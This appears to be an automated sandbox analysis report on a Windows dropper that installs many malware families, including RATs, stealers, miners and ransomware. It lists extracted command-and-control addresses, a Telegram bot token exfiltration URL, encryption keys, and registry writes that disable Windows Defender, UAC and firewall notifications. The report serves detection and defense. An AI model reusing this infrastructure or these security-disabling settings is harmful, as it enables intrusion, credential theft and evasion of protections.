Resubmissions
17-12-2024 13:35 | 241217-qv6rzs1nhp | 10
15-11-2024 19:06 | 241115-xr6q5szdnf | 10
14-11-2024 23:35 | 241114-3lfknavfqg | 10
14-11-2024 23:26 | 241114-3eysnavfje | 10
14-11-2024 23:12 | 241114-26znlavdqq | 10
Analysis
-
max time kernel
356s
-
max time network
459s
-
platform
windows10-ltsc 2021_x64
-
resource
win10ltsc2021-20241023-en
-
resource tags
arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
-
submitted
14-11-2024 23:12
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66
-
mutex
Klipux
Extracted
xworm
91.92.249.37:9049
https://pastebin.com/raw/LWUHVqrD:48602480
aMtkXNimPlkESDx9
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
62.113.117.95:4449
hwelcvbupaqfzors
-
delay
10
-
install
false
-
install_folder
%AppData%
Extracted
vidar
11.3
a770ee12f3b037ae568cfe2254681c7d
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Extracted
vidar
10.7
1b47b87875b9774afdda9b2528e389d1
https://steamcommunity.com/profiles/76561199751190313
https://t.me/pech0nk
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Extracted
amadey
5.03
7c4393
http://185.215.113.217
-
install_dir
f9c76c1660
-
install_file
corept.exe
-
strings_key
9808a67f01d2f0720518035acbde7521
-
url_paths
/CoreOPT/index.php
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
metasploit
windows/reverse_tcp
64.176.38.237:8139
Extracted
xworm
5.0
62.113.117.95:5665
oQNXB2TbsZoFMnfW
-
install_file
USB.exe
Extracted
quasar
1.4.1
Test
193.161.193.99:35184
67.205.154.243:35184
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
MS Build Tools
-
subdirectory
Microsoft-Build-Tools
Extracted
asyncrat
Venom RAT + HVNC + Receiving + Grabber v6.0.4
NewClient
157.20.182.183:4449
fsqshvwapaxdhwtdp
-
delay
1
-
install
false
-
install_file
Winup.exe
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
73.62.14.5:4782
3aaa11be-d135-4877-a61e-c409c29a7a60
-
encryption_key
BC9162791FD860195CF75664AE64885B64D5B5CE
-
install_name
Client1.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Startup
-
subdirectory
SubDir
Extracted
redline
Logs
185.215.113.9:9137
Extracted
metasploit
metasploit_stager
185.202.113.6:4243
Extracted
gurcu
https://api.telegram.org/bot7382558274:AAFZkCVTgYkuRWqDruBGK0C9eAD8ZoE6BOs/sendMessage?chat_id=966649672
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 10 IoCs
resource | yara_rule
behavioral1/memory/4304-900-0x00000000054B0000-0x00000000057B0000-memory.dmp | family_vidar_v7
behavioral1/memory/4304-901-0x00000000054B0000-0x00000000057B0000-memory.dmp | family_vidar_v7
behavioral1/memory/4304-902-0x00000000054B0000-0x00000000057B0000-memory.dmp | family_vidar_v7
behavioral1/memory/4304-923-0x00000000054B0000-0x00000000057B0000-memory.dmp | family_vidar_v7
behavioral1/memory/4304-924-0x00000000054B0000-0x00000000057B0000-memory.dmp | family_vidar_v7
behavioral1/memory/3000-937-0x0000000001990000-0x0000000001BD3000-memory.dmp | family_vidar_v7
behavioral1/memory/3000-938-0x0000000001990000-0x0000000001BD3000-memory.dmp | family_vidar_v7
behavioral1/memory/3000-939-0x0000000001990000-0x0000000001BD3000-memory.dmp | family_vidar_v7
behavioral1/memory/3000-952-0x0000000001990000-0x0000000001BD3000-memory.dmp | family_vidar_v7
behavioral1/memory/3000-953-0x0000000001990000-0x0000000001BD3000-memory.dmp | family_vidar_v7
-
Detect Xworm Payload 8 IoCs
resource | yara_rule
behavioral1/files/0x002800000004520d-491.dat | family_xworm
behavioral1/memory/4772-499-0x00000000009D0000-0x00000000009E6000-memory.dmp | family_xworm
behavioral1/files/0x0028000000045211-515.dat | family_xworm
behavioral1/memory/3400-523-0x00000000007F0000-0x0000000000804000-memory.dmp | family_xworm
behavioral1/memory/2816-1166-0x0000000000400000-0x000000000050D000-memory.dmp | family_xworm
behavioral1/memory/2816-1168-0x0000000000400000-0x000000000050D000-memory.dmp | family_xworm
behavioral1/files/0x002800000004528c-1185.dat | family_xworm
behavioral1/memory/1380-1245-0x0000000000A20000-0x0000000000A70000-memory.dmp | family_xworm
-
Detects Go variant of Hive Ransomware 1 IoCs
resource | yara_rule
behavioral1/memory/8548-13000-0x0000000000AB0000-0x0000000000D13000-memory.dmp | hive_go
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Gurcu family
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | def.exe
-
Modifies security service 2 TTPs 4 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysmablsvr.exe
-
Phorphiex family
-
Phorphiex payload 5 IoCs
resource | yara_rule
behavioral1/files/0x00040000000447b9-178.dat | family_phorphiex
behavioral1/files/0x0028000000045205-457.dat | family_phorphiex
behavioral1/files/0x002800000004520c-480.dat | family_phorphiex
behavioral1/files/0x0029000000045277-1078.dat | family_phorphiex
behavioral1/files/0x00270000000453ea-13191.dat | family_phorphiex
-
Quasar family
-
Quasar payload 5 IoCs
resource | yara_rule
behavioral1/files/0x00030000000414f4-6705.dat | family_quasar
behavioral1/memory/9088-9039-0x0000000000A90000-0x0000000000DB4000-memory.dmp | family_quasar
behavioral1/files/0x0004000000040f48-12432.dat | family_quasar
behavioral1/memory/6912-12440-0x0000000000350000-0x0000000000674000-memory.dmp | family_quasar
behavioral1/files/0x002a000000045365-12726.dat | family_quasar
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource | yara_rule
behavioral1/files/0x00280000000451c5-209.dat | family_redline
behavioral1/memory/3092-219-0x0000000000E30000-0x0000000000E6E000-memory.dmp | family_redline
behavioral1/files/0x00280000000453b8-12738.dat | family_redline
behavioral1/files/0x00310000000453c9-12927.dat | family_redline
behavioral1/memory/7556-12935-0x0000000000A50000-0x0000000000AA2000-memory.dmp | family_redline
behavioral1/files/0x0026000000045419-13359.dat | family_redline
-
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description | pid | Process | procid_target
PID 4304 created 3540 | 4304 | Organizational.pif | 56
PID 1140 created 3540 | 1140 | 3036535491.exe | 56
PID 1140 created 3540 | 1140 | 3036535491.exe | 56
PID 5772 created 3540 | 5772 | Jurisdiction.pif | 56
PID 5772 created 3540 | 5772 | Jurisdiction.pif | 56
PID 5700 created 3540 | 5700 | winupsecvmgr.exe | 56
PID 5700 created 3540 | 5700 | winupsecvmgr.exe | 56
PID 5700 created 3540 | 5700 | winupsecvmgr.exe | 56
PID 4548 created 3540 | 4548 | Councils.pif | 56
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | reg.exe
-
Vidar family
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysmablsvr.exe
-
Xmrig family
-
Xred family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002c000000045216-858.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | def.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | random.exe
-
Renames multiple (182) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 13 IoCs
resource | yara_rule
behavioral1/memory/5700-815-0x00007FF74B4D0000-0x00007FF74BA67000-memory.dmp | xmrig
behavioral1/memory/1984-834-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-853-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-879-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-884-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-904-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-951-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-974-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-1109-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-1137-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-1147-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-6471-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
behavioral1/memory/1984-12178-0x00007FF62C4E0000-0x00007FF62CCCF000-memory.dmp | xmrig
-
pid | Process
5704 | powershell.exe
348 | powershell.exe
8356 | powershell.exe
5192 | powershell.exe
5732 | powershell.exe
6080 | powershell.exe
6388 | powershell.exe
9796 | powershell.exe
8124 | powershell.exe
1236 | powershell.exe
4748 | powershell.exe
1544 | powershell.exe
8984 | powershell.exe
8096 | powershell.exe
5256 | powershell.exe
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid | Process
7504 | attrib.exe
-
Sets service image path in registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " | meshagent32-group.exe
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
6212 | chrome.exe
10908 | chrome.exe
6460 | chrome.exe
5492 | chrome.exe
8748 | chrome.exe
10256 | chrome.exe
6160 | chrome.exe
9332 | chrome.exe
4064 | chrome.exe
-
.NET Reactor protector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource | yara_rule
behavioral1/memory/11476-12223-0x0000000000E40000-0x0000000002848000-memory.dmp | net_reactor
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | def.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | def.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | random.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | random.exe
-
Checks computer location settings 2 TTPs 20 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | ldqj18tn.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | splwow64.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | explorer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | sysvplervcs.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | first.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | sysklnorbcv.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | Predicted.pif
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | SingerJudy.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | exclude.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 4363463463464363463463463.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | seo.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 312026255.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 41986531.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 1066112755.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | InfluencedNervous.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 147585972.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | sysppvrdnvs.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | Organizational.pif
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | 1234230369.exe
Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Drops startup file 14 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F0D1BDE8.[[email protected]].ncov | CoronaVirus.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | explorer.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | first.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | explorer.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F0D1BDE8.[[email protected]].ncov | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | first.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe | CoronaVirus.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url | cmd.exe
-
Executes dropped EXE 64 IoCs
pid | Process
2840 | seo.exe
1796 | ldqj18tn.exe
3456 | s.exe
3092 | frap.exe
3000 | Predicted.pif
5012 | sysvplervcs.exe
4304 | Organizational.pif
5288 | 312026255.exe
5676 | 391817420.exe
5804 | Meeting-https.exe
5992 | inst77player_1.0.0.1.exe
5180 | tdrpload.exe
2920 | o.exe
672 | sysppvrdnvs.exe
4772 | first.exe
5628 | tpeinf.exe
3400 | XClient.exe
5652 | sysklnorbcv.exe
6100 | 132069246.exe
5200 | splwow64.exe
1140 | 3036535491.exe
3184 | inst77player.exe
5136 | 41986531.exe
5700 | winupsecvmgr.exe
3824 | 1066112755.exe
5772 | Jurisdiction.pif
5624 | 1342430716.exe
1316 | 334793917.exe
5940 | 3084722593.exe
5208 | 2074828513.exe
4052 | XClient_protected.exe
3200 | khtoawdltrha.exe
1512 | pp.exe
4532 | CoronaVirus.exe
1420 | Installeraus.exe
4508 | meshagent32-group.exe
4664 | SingerJudy.exe
2320 | MeshAgent.exe
4552 | Journal.exe
3780 | exclude.exe
6088 | tt.exe
3196 | sysmablsvr.exe
4548 | Councils.pif
1668 | 1234230369.exe
644 | 2963921430.exe
1268 | BaddStore.exe
5956 | msf.exe
1380 | ._cache_aspnet_regiis.exe
2208 | Synaptics.exe
8128 | 1975213000.exe
7628 | bwapp.exe
6796 | av_downloader.exe
6468 | 2.exe
9088 | Client-built.exe
7888 | Windows.exe
7304 | AV_DOW~1.EXE
9336 | Client.exe
11476 | explorer.exe
11424 | RegAsm.exe
6728 | build555.exe
11044 | def.exe
7068 | pimer_bbbcontents7.exe
2156 | pimer_bbbcontents7.exe
6912 | Sentil.exe
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Wine | def.exe
Key opened | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Wine | random.exe
-
Loads dropped DLL 62 IoCs
pid | Process
5992 | inst77player_1.0.0.1.exe
5992 | inst77player_1.0.0.1.exe
5992 | inst77player_1.0.0.1.exe
4304 | Organizational.pif
1268 | BaddStore.exe
10712 | chrome.exe
10712 | chrome.exe
10712 | chrome.exe
10712 | chrome.exe
10712 | chrome.exe
10936 | chrome.exe
10936 | chrome.exe
10936 | chrome.exe
10936 | chrome.exe
10936 | chrome.exe
9184 | chrome.exe
9184 | chrome.exe
9184 | chrome.exe
7400 | chrome.exe
7400 | chrome.exe
7400 | chrome.exe
6200 | bot2.exe (39 identical entries)
7104 | wow.exe
7104 | wow.exe
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysmablsvr.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | def.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysvplervcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysppvrdnvs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysppvrdnvs.exe
